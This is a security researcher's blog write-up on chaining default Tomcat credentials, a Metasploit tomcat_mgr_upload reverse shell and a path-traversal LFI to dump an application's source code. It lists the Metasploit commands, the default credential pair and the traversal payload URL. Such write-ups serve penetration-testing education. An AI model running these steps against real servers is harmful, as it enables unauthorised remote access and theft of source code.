How I chained multiple bugs to maximize the impact (Default Credentials -> Reverse Connection-> LFI)

Pawan Chhabria
4 min read · Apr 1, 2023

Hello all! In the previous blog post, we saw how basic recon on Shodan helped us find a Tomcat service running on port 8082. We brute-forced the credentials using this list and eventually logged on to the server. After logging in, we uploaded a malicious .war file and got remote code execution.

In this blog post, let me walk you through how we can get a reverse shell on the server, which helps in maximizing the impact.

Please note: The domain and other details have been masked for confidentiality purposes.

Here are the pre-requisites for this attack:

The first thing we need to do is identify whether Tomcat is running on the server. If it is, we need to try the default credentials or brute force them; this git repo can be used to brute force credentials. The attack can only be performed if we have valid credentials for the Tomcat server. We will be using the Metasploit Framework for this attack.

So, let’s begin!!!

In our case, let's take the IP as X.X.X.X and the port as 8082. The credentials that worked for me were username=tomcat and password=s3cret. Now, let's launch Metasploit.

Once Metasploit is successfully launched, type the following commands one after the other.

(Note: you need to provide the correct details for the attack to succeed.)

use exploit/multi/http/tomcat_mgr_upload (This is the exploit)

set RHOSTS X.X.X.X (IP address of the remote machine)

set RPORT 8082 (Port on which tomcat is running on the remote machine)

set HttpPassword s3cret (Password of tomcat)

set HttpUsername tomcat (Username of tomcat)

set LHOST X.X.X.X (IP address of the machine on which you want the reverse connection)

set LPORT 4444 (Port on the machine on which you want the reverse connection)

exploit (Once all details are provided, we can use this command to launch the exploit)

It might give the following error:

Run the following command to get rid of the error and launch the exploit again.

set FingerprintCheck false

Wait a few seconds for the exploit to run. The following screenshots show that the exploit ran successfully and returned a reverse shell from the machine.

This is already the maximum impact, but I still wanted to show more. I had tried LFI to fetch a few sensitive files, but it didn't work.

After getting the shell, I noticed the /var/lib/ directory and its contents. There was a folder “tomcat9” which had “webapps” as a subfolder, and that folder contained the source code of the application.

I manually constructed the payload. The name of the file which contained the source code was “Webappcode.war”.

So, the payload became ../../../../../../var/lib/tomcat9/webapps/Webappcode.war

The application had a parameter called “template” which fetched and downloaded something. The final URL to exploit the LFI became https://example.com/sh/doc?template=../../../../../../var/lib/tomcat9/webapps/Webappcode.war. I tried this payload and Boooooooooooom!!!!, the source code was dumped successfully.

Golden Tip: To catch a thief, you need to think like one, and you will eventually end up exploiting the vulnerability to show the maximum impact.

That’s it for this writeup.

Happy Hacking and Happy Testing!!!

Make sure you say a “Hi” to me if I could be of some help!

Twitter: @heybenchmarkkk

LinkedIn: Pawan Chhabria

Pawan Chhabria

a.k.a Benchmarkkk | Security Enthusiast| Web | Android | API |Top OnePlus Hacker 2019–2020 | Google Hall of Fame